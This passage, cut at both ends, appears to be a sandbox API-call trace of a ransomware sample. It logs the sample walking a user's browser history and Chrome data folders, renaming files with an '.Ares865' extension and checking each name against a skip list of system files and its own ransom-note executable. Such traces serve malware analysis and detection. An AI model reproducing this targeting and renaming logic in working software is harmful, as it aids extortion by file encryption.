param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low\\History.IE5\\MSHist012017071220170713\\index.dat.Ares865") returned 111 [0099.711] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low\\History.IE5\\MSHist012017071220170713\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\history\\low\\history.ie5\\mshist012017071220170713\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low\\History.IE5\\MSHist012017071220170713\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\history\\low\\history.ie5\\mshist012017071220170713\\index.dat.ares865"), dwFlags=0x1) returned 1 [0099.712] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low\\History.IE5\\MSHist012017071220170713\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\history\\low\\history.ie5\\mshist012017071220170713\\index.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.712] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32768) returned 1 [0099.719] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\History.IE5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\History.IE5" [0099.720] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\History.IE5\\desktop.ini.Ares865") returned 84 [0099.720] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\History.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\history\\history.ie5\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\History.IE5\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\history\\history.ie5\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0099.721] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\History.IE5\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\history\\history.ie5\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.721] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=145) returned 1 [0099.724] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\History.IE5\\index.dat.Ares865") returned 82 [0099.724] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\history\\history.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\History.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\history\\history.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0099.724] GetLastError () returned 0x20 [0099.724] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 104 [0099.725] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 104 [0099.725] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0099.725] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5ba3 [0099.725] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x68, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x68, lpOverlapped=0x0) returned 1 [0099.725] CloseHandle (hObject=0x118) returned 1 [0099.726] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0099.726] CloseHandle (hObject=0x0) returned 0 [0099.726] CloseHandle (hObject=0x0) returned 0 [0099.726] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSHist012019091320190914", cAlternateFileName="MSHIST~1")) returned 1 [0099.726] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0099.726] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="aoldtz.exe") returned 1 [0099.726] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2=".") returned 1 [0099.726] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="..") returned 1 [0099.726] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="windows") returned -1 [0099.726] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="bootmgr") returned 1 [0099.726] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="temp") returned -1 [0099.726] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="pagefile.sys") returned -1 [0099.726] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="boot") returned 1 [0099.726] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="ids.txt") returned 1 [0099.726] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="ntuser.dat") returned -1 [0099.726] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="perflogs") returned -1 [0099.726] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="MSBuild") returned 1 [0099.726] lstrlenW (lpString="MSHist012019091320190914") returned 24 [0099.726] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\History.IE5\\index.dat") returned 74 [0099.726] lstrcpyW (in: lpString1=0x2cce482, lpString2="MSHist012019091320190914" | out: lpString1="MSHist012019091320190914") returned="MSHist012019091320190914" [0099.726] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0099.726] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb4) returned 0x2f2fc8 [0099.726] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7b90 [0099.726] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSHist012019091320190914", cAlternateFileName="MSHIST~1")) returned 0 [0099.726] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0099.726] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c30 [0099.726] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\History.IE5\\MSHist012019091320190914", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\History.IE5\\MSHist012019091320190914") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\History.IE5\\MSHist012019091320190914" [0099.727] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865") returned 107 [0099.727] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\History.IE5\\MSHist012019091320190914\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\history\\history.ie5\\mshist012019091320190914\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\history\\history.ie5\\mshist012019091320190914\\index.dat.ares865"), dwFlags=0x1) returned 0 [0099.727] GetLastError () returned 0x20 [0099.727] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 129 [0099.727] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 129 [0099.727] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0099.728] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5c0b [0099.728] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x81, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x81, lpOverlapped=0x0) returned 1 [0099.728] CloseHandle (hObject=0x118) returned 1 [0099.728] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0099.728] CloseHandle (hObject=0x0) returned 0 [0099.728] CloseHandle (hObject=0x0) returned 0 [0099.728] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3897c980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x83c55340, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0099.728] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0099.728] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0099.728] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google" [0099.729] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\CrashReports", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\CrashReports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\CrashReports" [0099.729] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome" [0099.730] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data" [0099.730] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\First Run.Ares865") returned 86 [0099.730] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\First Run" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\first run"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\First Run.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\first run.ares865"), dwFlags=0x1) returned 1 [0099.732] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\First Run.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\first run.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.732] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0099.732] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0099.732] CloseHandle (hObject=0x0) returned 0 [0099.732] CloseHandle (hObject=0x118) returned 1 [0099.732] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ddb73a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4ddb73a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0099.732] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0099.732] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85749110, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c0bcce0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x4dddd500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x10b30, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local State.Ares865", cAlternateFileName="LOCALS~1.ARE")) returned 1 [0099.732] lstrcmpiW (lpString1="Local State.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0099.732] lstrcmpiW (lpString1="Local State.Ares865", lpString2="aoldtz.exe") returned 1 [0099.733] lstrcmpiW (lpString1="Local State.Ares865", lpString2=".") returned 1 [0099.733] lstrcmpiW (lpString1="Local State.Ares865", lpString2="..") returned 1 [0099.733] lstrcmpiW (lpString1="Local State.Ares865", lpString2="windows") returned -1 [0099.733] lstrcmpiW (lpString1="Local State.Ares865", lpString2="bootmgr") returned 1 [0099.733] lstrcmpiW (lpString1="Local State.Ares865", lpString2="temp") returned -1 [0099.733] lstrcmpiW (lpString1="Local State.Ares865", lpString2="pagefile.sys") returned -1 [0099.733] lstrcmpiW (lpString1="Local State.Ares865", lpString2="boot") returned 1 [0099.733] lstrcmpiW (lpString1="Local State.Ares865", lpString2="ids.txt") returned 1 [0099.733] lstrcmpiW (lpString1="Local State.Ares865", lpString2="ntuser.dat") returned -1 [0099.733] lstrcmpiW (lpString1="Local State.Ares865", lpString2="perflogs") returned -1 [0099.733] lstrcmpiW (lpString1="Local State.Ares865", lpString2="MSBuild") returned -1 [0099.733] lstrlenW (lpString="Local State.Ares865") returned 19 [0099.733] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\First Run") returned 78 [0099.733] lstrcpyW (in: lpString1=0x2cce48a, lpString2="Local State.Ares865" | out: lpString1="Local State.Ares865") returned="Local State.Ares865" [0099.733] lstrlenW (lpString="Local State.Ares865") returned 19 [0099.733] lstrlenW (lpString="Ares865") returned 7 [0099.733] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0099.733] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4de03660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4de03660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OriginTrials", cAlternateFileName="ORIGIN~1")) returned 1 [0099.733] lstrcmpiW (lpString1="OriginTrials", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0099.733] lstrcmpiW (lpString1="OriginTrials", lpString2="aoldtz.exe") returned 1 [0099.733] lstrcmpiW (lpString1="OriginTrials", lpString2=".") returned 1 [0099.733] lstrcmpiW (lpString1="OriginTrials", lpString2="..") returned 1 [0099.733] lstrcmpiW (lpString1="OriginTrials", lpString2="windows") returned -1 [0099.733] lstrcmpiW (lpString1="OriginTrials", lpString2="bootmgr") returned 1 [0099.733] lstrcmpiW (lpString1="OriginTrials", lpString2="temp") returned -1 [0099.733] lstrcmpiW (lpString1="OriginTrials", lpString2="pagefile.sys") returned -1 [0099.733] lstrcmpiW (lpString1="OriginTrials", lpString2="boot") returned 1 [0099.733] lstrcmpiW (lpString1="OriginTrials", lpString2="ids.txt") returned 1 [0099.733] lstrcmpiW (lpString1="OriginTrials", lpString2="ntuser.dat") returned 1 [0099.733] lstrcmpiW (lpString1="OriginTrials", lpString2="perflogs") returned -1 [0099.733] lstrcmpiW (lpString1="OriginTrials", lpString2="MSBuild") returned 1 [0099.733] lstrlenW (lpString="OriginTrials") returned 12 [0099.733] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Local State.Ares865") returned 88 [0099.733] lstrcpyW (in: lpString1=0x2cce48a, lpString2="OriginTrials" | out: lpString1="OriginTrials") returned="OriginTrials" [0099.733] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79e8 [0099.733] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa4) returned 0x2e27c0 [0099.734] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79f0 | out: ListHead=0x2e7710, ListEntry=0x2e79f0) returned 0x2e7790 [0099.734] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4de03660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4de03660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PepperFlash", cAlternateFileName="PEPPER~1")) returned 1 [0099.734] lstrcmpiW (lpString1="PepperFlash", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0099.734] lstrcmpiW (lpString1="PepperFlash", lpString2="aoldtz.exe") returned 1 [0099.734] lstrcmpiW (lpString1="PepperFlash", lpString2=".") returned 1 [0099.734] lstrcmpiW (lpString1="PepperFlash", lpString2="..") returned 1 [0099.734] lstrcmpiW (lpString1="PepperFlash", lpString2="windows") returned -1 [0099.734] lstrcmpiW (lpString1="PepperFlash", lpString2="bootmgr") returned 1 [0099.734] lstrcmpiW (lpString1="PepperFlash", lpString2="temp") returned -1 [0099.734] lstrcmpiW (lpString1="PepperFlash", lpString2="pagefile.sys") returned 1 [0099.734] lstrcmpiW (lpString1="PepperFlash", lpString2="boot") returned 1 [0099.734] lstrcmpiW (lpString1="PepperFlash", lpString2="ids.txt") returned 1 [0099.734] lstrcmpiW (lpString1="PepperFlash", lpString2="ntuser.dat") returned 1 [0099.734] lstrcmpiW (lpString1="PepperFlash", lpString2="perflogs") returned -1 [0099.734] lstrcmpiW (lpString1="PepperFlash", lpString2="MSBuild") returned 1 [0099.734] lstrlenW (lpString="PepperFlash") returned 11 [0099.734] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\OriginTrials") returned 81 [0099.734] lstrcpyW (in: lpString1=0x2cce48a, lpString2="PepperFlash" | out: lpString1="PepperFlash") returned="PepperFlash" [0099.734] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a08 [0099.734] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa2) returned 0x2e2870 [0099.734] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a10 | out: ListHead=0x2e7710, ListEntry=0x2e7a10) returned 0x2e79f0 [0099.734] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e47510, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4de03660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4de03660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pnacl", cAlternateFileName="")) returned 1 [0099.734] lstrcmpiW (lpString1="pnacl", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0099.734] lstrcmpiW (lpString1="pnacl", lpString2="aoldtz.exe") returned 1 [0099.734] lstrcmpiW (lpString1="pnacl", lpString2=".") returned 1 [0099.734] lstrcmpiW (lpString1="pnacl", lpString2="..") returned 1 [0099.734] lstrcmpiW (lpString1="pnacl", lpString2="windows") returned -1 [0099.734] lstrcmpiW (lpString1="pnacl", lpString2="bootmgr") returned 1 [0099.734] lstrcmpiW (lpString1="pnacl", lpString2="temp") returned -1 [0099.734] lstrcmpiW (lpString1="pnacl", lpString2="pagefile.sys") returned 1 [0099.734] lstrcmpiW (lpString1="pnacl", lpString2="boot") returned 1 [0099.734] lstrcmpiW (lpString1="pnacl", lpString2="ids.txt") returned 1 [0099.734] lstrcmpiW (lpString1="pnacl", lpString2="ntuser.dat") returned 1 [0099.734] lstrcmpiW (lpString1="pnacl", lpString2="perflogs") returned 1 [0099.735] lstrcmpiW (lpString1="pnacl", lpString2="MSBuild") returned 1 [0099.735] lstrlenW (lpString="pnacl") returned 5 [0099.735] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\PepperFlash") returned 80 [0099.735] lstrcpyW (in: lpString1=0x2cce48a, lpString2="pnacl" | out: lpString1="pnacl") returned="pnacl" [0099.735] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a28 [0099.735] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x96) returned 0x334fc8 [0099.735] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a30 | out: ListHead=0x2e7710, ListEntry=0x2e7a30) returned 0x2e7a10 [0099.735] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85e6fa20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85e6fa20, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x97f6e8b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Safe Browsing Channel IDs", cAlternateFileName="SAFEBR~3")) returned 1 [0099.735] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0099.735] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2="aoldtz.exe") returned 1 [0099.735] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2=".") returned 1 [0099.735] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2="..") returned 1 [0099.735] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2="windows") returned -1 [0099.735] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2="bootmgr") returned 1 [0099.735] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2="temp") returned -1 [0099.735] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2="pagefile.sys") returned 1 [0099.735] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2="boot") returned 1 [0099.735] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2="ids.txt") returned 1 [0099.735] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2="ntuser.dat") returned 1 [0099.735] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2="perflogs") returned 1 [0099.735] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2="MSBuild") returned 1 [0099.735] lstrlenW (lpString="Safe Browsing Channel IDs") returned 25 [0099.735] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\pnacl") returned 74 [0099.735] lstrcpyW (in: lpString1=0x2cce48a, lpString2="Safe Browsing Channel IDs" | out: lpString1="Safe Browsing Channel IDs") returned="Safe Browsing Channel IDs" [0099.735] lstrlenW (lpString="Safe Browsing Channel IDs") returned 25 [0099.735] lstrlenW (lpString="Ares865") returned 7 [0099.735] lstrcmpiW (lpString1="nel IDs", lpString2="Ares865") returned 1 [0099.735] lstrlenW (lpString=".dll") returned 4 [0099.735] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2=".dll") returned 1 [0099.735] lstrlenW (lpString=".lnk") returned 4 [0099.735] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2=".lnk") returned 1 [0099.735] lstrlenW (lpString=".ini") returned 4 [0099.735] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2=".ini") returned 1 [0099.735] lstrlenW (lpString=".sys") returned 4 [0099.735] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2=".sys") returned 1 [0099.735] lstrlenW (lpString="Safe Browsing Channel IDs") returned 25 [0099.736] wsprintfW (in: 